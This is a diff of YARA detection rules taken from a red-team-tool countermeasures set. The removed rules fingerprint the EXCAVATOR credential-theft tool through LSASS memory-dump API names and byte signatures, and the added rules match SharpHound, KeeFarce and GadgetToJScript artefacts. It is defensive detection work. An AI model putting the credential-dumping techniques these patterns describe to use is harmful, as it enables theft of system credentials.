+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PUPPYHOUND/production/yara/HackTool_MSIL_SharpHound_3.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4414953fa397a41156f6fa4f9462d207"
-		logic_hash = "4256bfd3713f330d76cad9d1ddbba91e588dbca2e2b6842e9482525805ddc1e8"
+		hash = "eeedc09570324767a3de8205f66a5295"
+		logic_hash = "baeea6cae42c755ee389378229b2b206c82f60f75a5ce5f9cfa06871fc9507d1"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 4
 
 	strings:
-		$sb1 = { C7 44 24 0C 04 00 00 00 C7 44 24 08 00 10 00 00 [4-32] C7 04 24 00 00 00 00 [0-32] FF [1-16] 89 45 ?? 83 7D ?? 00 [2-150] 0F B? ?? 8B [2] B? CD CC CC CC 89 ?? F7 ?? C1 ?? 04 89 ?? C1 ?? 02 [0-32] 0F B? [5-32] 3? [1-16] 88 }
-		$sb2 = { C? 45 ?? B8 [0-4] C? 45 ?? 00 [0-64] FF [0-32] E0 [0-32] C7 44 24 08 40 00 00 00 [0-32] C7 44 24 04 07 00 00 00 [0-32] FF [1-64] 89 ?? 0F B? [2-3] 89 ?? 04 0F B? [2] 88 ?? 06 8B ?? 08 8D ?? 01 8B 45 0C }
+		$typelibguid1 = "A517A8DE-5834-411D-ABDA-2D0E1766539C" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_APT_Hacktool_Win64_EXCAVATOR_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Keefarce_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'KeeFarce' project."
 		author = "FireEye"
-		id = "e593b589-747d-53c2-a39a-57485e4f7641"
-		date = "2020-11-30"
-		date = "2020-11-30"
+		id = "c17add0c-e09f-5ced-a4e1-bf60afad4725"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/APT_HackTool_Win64_EXCAVATOR_1.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/KEEFARCE/production/yara/HackTool_MSIL_KeeFarce_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "6a9a114928554c26675884eeb40cc01b"
-		logic_hash = "aa06628ddef0f95c4217b97a3476a0ee12e00d04c4827a512730598f3c80f1f6"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "8db86230849137608880dbe448737fc70068d308772e294cc69301b18ae10908"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		rev = 3
 
 	strings:
-		$api1 = "PssCaptureSnapshot" fullword
-		$api2 = "MiniDumpWriteDump" fullword
-		$dump = { BA FD 03 00 AC [0-8] 41 B8 1F 00 10 00 48 8B ?? FF 15 [4] 85 C0 0F 85 [2] 00 00 [0-2] 48 8D 05 [5] 89 ?? 24 30 ( C7 44 24 28 80 00 00 00 48 8D 0D ?? ?? ?? ?? | 48 8D 0D ?? ?? ?? ?? C7 44 24 28 80 00 00 00 ) 45 33 C9 [0-5] 45 33 C0 C7 44 24 20 01 00 00 00 BA 00 00 00 10 [0-10] FF 15 [4] 48 8B ?? 48 83 F8 FF ( 74 | 0F 84 ) [1-4] 48 8B 4C 24 ?? 48 8D 44 24 ?? 48 89 44 24 30 ( 41 B9 02 00 00 00 | 44 8D 4D 02 ) ?? 89 ?? 24 28 4C 8B ?? 8B [2] 89 ?? 24 20 FF 15 [4] 48 8B ?? FF 15 [4] 48 8B ?? FF 15 [4] FF 15 [4] 48 8B 54 24 ?? 48 8B C8 FF 15 }
-		$lsass = { 6C 73 61 73 [6] 73 2E 65 78 [6] 65 }
+		$typelibguid0 = "17589ea6-fcc9-44bb-92ad-d5b3eea6af03" ascii nocase wide
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Credtheft_Win_EXCAVATOR_2 : FILE
+rule FIREEYE_RT_Hunting_Gadgettojscript_1
 {
 	meta:
-		description = "This rule looks for the binary signature of the routine that calls PssFreeSnapshot found in the Excavator-Reflector DLL."
+		description = "This rule is looking for B64 offsets of LazyNetToJscriptLoader which is a namespace specific to the internal version of the GadgetToJScript tooling."
 		author = "FireEye"
-		id = "89037b9a-78b0-5a8c-bb60-3d54842d81e1"
+		id = "76c932e0-55b3-56ef-bab6-eb6997b51ee7"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/CredTheft_Win_EXCAVATOR_2.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/G2JS/production/yara/Hunting_GadgetToJScript_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "6a9a114928554c26675884eeb40cc01b"
-		logic_hash = "408e8862f0c470105648fdba00dc5531ffcd739fa544f89acb70f0fa1b105c03"
-		score = 75
+		hash = "7af24305a409a2b8f83ece27bb0f7900"
+		logic_hash = "a880c20e61376dacd4e3a04f2cf065f19067c29371180b1dec186172cadf9564"
+		score = 50
 		quality = 75
-		tags = "FILE"
-		rev = 3
+		tags = ""
+		rev = 4
 
 	strings:
-		$bytes1 = { 4C 89 74 24 20 55 48 8D AC 24 60 FF FF FF 48 81 EC A0 01 00 00 48 8B 05 4C 4A 01 00 48 33 C4 48 89 85 90 00 00 00 BA 50 00 00 00 C7 05 CB 65 01 00 43 00 3A 00 66 89 15 EC 65 01 00 4C 8D 44 24 68 48 8D 15 D8 68 01 00 C7 05 B2 65 01 00 5C 00 57 00 33 C9 C7 05 AA 65 01 00 69 00 6E 00 C7 05 A4 65 01 00 64 00 6F 00 C7 05 9E 65 01 00 77 00 73 00 C7 05 98 65 01 00 5C 00 4D 00 C7 05 92 65 01 00 45 00 4D 00 C7 05 8C 65 01 00 4F 00 52 00 C7 05 86 65 01 00 59 00 2E 00 C7 05 80 65 01 00 44 00 4D 00 C7 05 72 68 01 00 53 00 65 00 C7 05 6C 68 01 00 44 00 65 00 C7 05 66 68 01 00 42 00 75 00 C7 05 60 68 01 00 47 00 50 00 C7 05 5A 68 01 00 72 00 69 00 C7 05 54 68 01 00 56 00 69 00 C7 05 4E 68 01 00 4C 00 45 00 C7 05 48 68 01 00 67 00 65 00 C7 05 12 67 01 00 6C 73 61 73 C7 05 0C 67 01 00 73 2E 65 78 C6 05 09 67 01 00 65 FF 15 63 B9 00 00 45 33 F6 85 C0 74 66 48 8B 44 24 68 48 89 44 24 74 C7 44 24 70 01 00 00 00 C7 44 24 7C 02 00 00 00 FF 15 A4 B9 00 00 48 8B C8 4C 8D 44 24 48 41 8D 56 20 FF 15 1A B9 00 00 85 C0 74 30 48 8B 4C 24 48 4C 8D 44 24 70 4C 89 74 24 28 45 33 C9 33 D2 4C 89 74 24 20 FF 15 EF B8 00 00 FF 15 11 B9 00 00 48 8B 4C 24 48 FF 15 16 B9 00 00 48 89 9C 24 B0 01 00 00 48 8D 0D BF 2E 01 00 48 89 B4 24 B8 01 00 00 4C 89 74 24 40 FF 15 1C B9 00 00 48 85 C0 0F 84 B0 00 00 00 48 8D 15 AC 2E 01 00 48 8B C8 FF 15 1B B9 00 00 48 8B D8 48 85 C0 0F 84 94 00 00 00 33 D2 48 8D 4D 80 41 B8 04 01 00 00 E8 06 15 00 00 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 63 66 0F 1F 44 00 00 48 8B 4C 24 40 4C 8D 45 80 41 B9 04 01 00 00 33 D2 FF 15 89 B8 00 00 48 8D 15 F2 65 01 00 48 8D 4D 80 E8 49 0F 00 00 48 85 C0 75 38 33 D2 48 8D 4D 80 41 B8 04 01 00 00 E8 A3 14 00 00 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 A3 33 C0 E9 F5 00 00 00 48 8B 5C 24 40 48 8B CB FF 15 5E B8 00 00 8B F0 48 85 DB 74 E4 85 C0 74 E0 4C 8D 4C 24 50 48 89 BC 24 C0 01 00 00 BA FD 03 00 AC 41 B8 1F 00 10 00 48 8B CB FF 15 12 B8 00 00 85 C0 0F 85 A0 00 00 00 48 8D 05 43 FD FF FF 4C 89 74 24 30 C7 44 24 28 80 00 00 00 48 8D 0D 3F 63 01 00 45 33 C9 48 89 44 24 58 45 33 C0 C7 44 24 20 01 00 00 00 BA 00 00 00 10 4C 89 74 24 60 FF 15 E4 B7 00 00 48 8B F8 48 83 F8 FF 74 59 48 8B 4C 24 50 48 8D 44 24 58 48 89 44 24 30 41 B9 02 00 00 00 4C 89 74 24 28 4C 8B C7 8B D6 4C 89 74 24 20 FF 15 B1 B9 00 00 48 8B CB FF 15 78 B7 00 00 48 8B CF FF 15 6F B7 00 00 FF 15 B1 B7 00 00 48 8B 54 24 50 48 8B C8 FF 15 53 B7 00 00 33 C9 FF 15 63 B7 00 00 CC 48 8B CB FF 15 49 B7 00 00 48 8B BC 24 C0 01 00 00 33 C0 48 8B B4 24 B8 01 00 00 48 8B 9C 24 B0 01 00 00 48 8B 8D 90 00 00 00 48 33 CC E8 28 00 00 00 4C 8B B4 24 C8 01 00 00 48 81 C4 A0 01 00 00 5D C3 }
-		$bytes2 = { 4C 89 74 24 20 55 48 8D AC 24 60 FF FF FF 48 81 EC A? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 85 9? ?? ?? ?0 BA ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 89 ?? ?? ?? ?? ?? 4C 8D 44 24 68 48 ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C6 ?? ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 45 33 F6 85 C0 74 ?? 48 8B 44 24 68 48 89 44 24 74 C7 44 24 7? ?1 ?? ?? ?? C7 44 24 7C 02 ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B C8 4C 8D 44 24 48 41 8D 56 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 48 4C 8D 44 24 70 4C 89 74 24 28 45 33 C9 33 D2 4C 89 74 24 20 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 4C 24 48 FF ?? ?? ?? ?? ?? 48 89 9C 24 B? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 B4 24 B8 01 ?? ?? 4C 89 74 24 40 FF ?? ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 0F 1F 44 ?? ?? 48 8B 4C 24 40 4C 8D 45 80 41 ?? ?? ?? ?? ?? 33 D2 FF ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8D 4D 80 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 5C 24 40 48 8B CB FF ?? ?? ?? ?? ?? 8B F0 48 85 DB 74 ?? 85 C0 74 ?? 4C 8D 4C 24 50 48 89 BC 24 C? ?1 ?? ?? BA ?? ?? ?? ?? 41 ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 30 C7 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 45 33 C9 48 89 44 24 58 45 33 C0 C7 44 24 2? ?1 ?? ?? ?? BA ?? ?? ?? ?? 4C 89 74 24 60 FF ?? ?? ?? ?? ?? 48 8B F8 48 83 F8 FF 74 ?? 48 8B 4C 24 50 48 8D 44 24 58 48 89 44 24 30 41 B9 02 ?? ?? ?? 4C 89 74 24 28 4C 8B C7 8B D6 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 54 24 50 48 8B C8 FF ?? ?? ?? ?? ?? 33 C9 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B BC 24 C? ?1 ?? ?? 33 C0 48 8B B4 24 B8 01 ?? ?? 48 8B 9C 24 B? ?1 ?? ?? 48 8B 8D 9? ?? ?? ?0 48 33 CC E8 ?? ?? ?? ?? 4C 8B B4 24 C8 01 ?? ?? 48 81 C4 A? ?1 ?? ?? 5D C3 }
-		$bytes3 = { 4C 89 74 24 20 55 48 8D AC 24 60 FF FF FF 48 81 EC A? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 85 9? ?? ?? ?0 BA ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 89 ?? ?? ?? ?? ?? 4C 8D 44 24 68 48 ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C6 ?? ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 45 33 F6 85 C0 74 ?? 48 8B 44 24 68 48 89 44 24 74 C7 44 24 7? ?1 ?? ?? ?? C7 44 24 7C 02 ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B C8 4C 8D 44 24 48 41 8D 56 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 48 4C 8D 44 24 70 4C 89 74 24 28 45 33 C9 33 D2 4C 89 74 24 20 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 4C 24 48 FF ?? ?? ?? ?? ?? 48 89 9C 24 B? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 B4 24 B8 01 ?? ?? 4C 89 74 24 40 FF ?? ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 0F 1F 44 ?? ?? 48 8B 4C 24 40 4C 8D 45 80 41 ?? ?? ?? ?? ?? 33 D2 FF ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8D 4D 80 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 5C 24 40 48 8B CB FF ?? ?? ?? ?? ?? 8B F0 48 85 DB 74 ?? 85 C0 74 ?? 4C 8D 4C 24 50 48 89 BC 24 C? ?1 ?? ?? BA ?? ?? ?? ?? 41 ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 30 C7 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 45 33 C9 48 89 44 24 58 45 33 C0 C7 44 24 2? ?1 ?? ?? ?? BA ?? ?? ?? ?? 4C 89 74 24 60 FF ?? ?? ?? ?? ?? 48 8B F8 48 83 F8 FF 74 ?? 48 8B 4C 24 50 48 8D 44 24 58 48 89 44 24 30 41 B9 02 ?? ?? ?? 4C 89 74 24 28 4C 8B C7 8B D6 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 54 24 50 48 8B C8 FF ?? ?? ?? ?? ?? 33 C9 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B BC 24 C? ?1 ?? ?? 33 C0 48 8B B4 24 B8 01 ?? ?? 48 8B 9C 24 B? ?1 ?? ?? 48 8B 8D 9? ?? ?? ?0 48 33 CC E8 ?? ?? ?? ?? 4C 8B B4 24 C8 01 ?? ?? 48 81 C4 A? ?1 ?? ?? 5D C3 }
-		$bytes4 = { 4C 89 74 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC A0 01 00 00 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? BA 50 00 00 00 C7 05 ?? ?? ?? ?? 43 00 3A 00 66 89 15 ?? ?? 01 00 4C 8D 44 24 ?? 48 8D 15 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 5C 00 57 00 33 C9 C7 05 ?? ?? ?? ?? 69 00 6E 00 C7 05 ?? ?? ?? ?? 64 00 6F 00 C7 05 ?? ?? ?? ?? 77 00 73 00 C7 05 ?? ?? ?? ?? 5C 00 4D 00 C7 05 ?? ?? ?? ?? 45 00 4D 00 C7 05 ?? ?? ?? ?? 4F 00 52 00 C7 05 ?? ?? ?? ?? 59 00 2E 00 C7 05 ?? ?? ?? ?? 44 00 4D 00 C7 05 ?? ?? ?? ?? 53 00 65 00 C7 05 ?? ?? ?? ?? 44 00 65 00 C7 05 ?? ?? ?? ?? 42 00 75 00 C7 05 ?? ?? ?? ?? 47 00 50 00 C7 05 ?? ?? ?? ?? 72 00 69 00 C7 05 ?? ?? ?? ?? 56 00 69 00 C7 05 ?? ?? ?? ?? 4C 00 45 00 C7 05 ?? ?? ?? ?? 67 00 65 00 C7 05 ?? ?? ?? ?? 6C 73 61 73 C7 05 ?? ?? ?? ?? 73 2E 65 78 C6 05 ?? ?? ?? ?? 65 FF 15 ?? ?? ?? ?? 45 33 F6 85 C0 74 ?? 48 8B 44 24 ?? 48 89 44 24 ?? C7 44 24 ?? 01 00 00 00 C7 44 24 ?? 02 00 00 00 FF 15 ?? ?? ?? ?? 48 8B C8 4C 8D 44 24 ?? 41 8D 56 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 4C 8D 44 24 ?? 4C 89 74 24 ?? 45 33 C9 33 D2 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D ?? 41 B8 04 01 00 00 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 ?? 66 0F 1F 44 00 ?? 48 8B 4C 24 ?? 4C 8D 45 ?? 41 B9 04 01 00 00 33 D2 FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 D2 48 8D 4D ?? 41 B8 04 01 00 00 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 8B F0 48 85 DB 74 ?? 85 C0 74 ?? 4C 8D 4C 24 ?? 48 89 BC 24 ?? ?? ?? ?? BA FD 03 00 AC 41 B8 1F 00 10 00 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 4C 89 74 24 ?? C7 44 24 ?? 80 00 00 00 48 8D 0D ?? ?? ?? ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 C7 44 24 ?? 01 00 00 00 BA 00 00 00 10 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 83 F8 FF 74 ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 48 89 44 24 ?? 41 B9 02 00 00 00 4C 89 74 24 ?? 4C 8B C7 8B D6 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B C8 FF 15 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? CC 48 8B CB FF 15 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 33 C0 48 8B B4 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ?? ?? 48 81 C4 A0 01 00 00 5D C3 }
+		$s1 = "GF6eU5ldFRvSnNjcmlwdExvYWRl"
+		$s2 = "henlOZXRUb0pzY3JpcHRMb2Fk"
+		$s3 = "YXp5TmV0VG9Kc2NyaXB0TG9hZGV"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and any of ( $bytes* )
+		any of them
 }
-rule FIREEYE_RT_APT_Hacktool_Win64_EXCAVATOR_2 : FILE
+rule FIREEYE_RT_Hunting_B64Engine_Dotnettojscript_Dos
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "This file may enclude a Base64 encoded .NET executable. This technique is used by the project DotNetToJScript which is used by many malware families including GadgetToJScript."
 		author = "FireEye"
-		id = "4b7640e8-5621-5cc3-8ac9-84347f23f5eb"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "24c9c259-9bb9-5f46-9278-4fa20eb3c8c4"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/APT_HackTool_Win64_EXCAVATOR_2.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/G2JS/production/yara/Hunting_B64Engine_DotNetToJScript_Dos.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4fd62068e591cbd6f413e1c2b8f75442"
-		logic_hash = "14263c17323cd78df10f7f101bd7a9c74f7818b34a2e42125d45205067399381"
-		score = 75
+		hash = "7af24305a409a2b8f83ece27bb0f7900"
+		logic_hash = "e2afb43af469f8ae02f6fd21db6dbd45c997fb003e3aeeaa0d4ff3e85c64159a"
+		score = 50
 		quality = 75
-		tags = "FILE"
+		tags = ""
 		rev = 1
 
 	strings:
-		$api1 = "PssCaptureSnapshot" fullword
-		$api2 = "MiniDumpWriteDump" fullword
-		$dump = { C7 [2-5] FD 03 00 AC 4C 8D 4D ?? 41 B8 1F 00 10 00 8B [2-5] 48 8B 4D ?? E8 [4] 89 [2-5] 83 [2-5] 00 74 ?? 48 8B 4D ?? FF 15 [4] 33 C0 E9 [4] 41 B8 10 00 00 00 33 D2 48 8D 8D [4] E8 [4] 48 8D 05 [4] 48 89 85 [4] 48 C7 85 [8] 48 C7 44 24 30 00 00 00 00 C7 44 24 28 80 00 00 00 C7 44 24 20 01 00 00 00 45 33 C9 45 33 C0 BA 00 00 00 10 48 8D 0D [4] FF 15 [4] 48 89 85 [4] 48 83 BD [4] FF 75 ?? 48 8B 4D ?? FF 15 [4] 33 C0 EB [0-17] 48 8D [5] 48 89 ?? 24 30 48 C7 44 24 28 00 00 00 00 48 C7 44 24 20 00 00 00 00 41 B9 02 00 00 00 4C 8B 85 [4] 8B [1-5] 48 8B 4D ?? E8 }
-		$enable_dbg_pri = { 4C 8D 45 ?? 48 8D 15 [4] 33 C9 FF 15 [4] 85 C0 0F 84 [4] C7 45 ?? 01 00 00 00 B8 0C 00 00 00 48 6B C0 00 48 8B 4D ?? 48 89 4C 05 ?? B8 0C 00 00 00 48 6B C0 00 C7 44 05 ?? 02 00 00 00 FF 15 [4] 4C 8D 45 ?? BA 20 00 00 00 48 8B C8 FF 15 [4] 85 C0 74 ?? 48 C7 44 24 28 00 00 00 00 48 C7 44 24 20 00 00 00 00 45 33 C9 4C 8D 45 ?? 33 D2 48 8B 4D ?? FF 15 }
+		$b64_mz = "AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAUEU"
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) ) and all of them
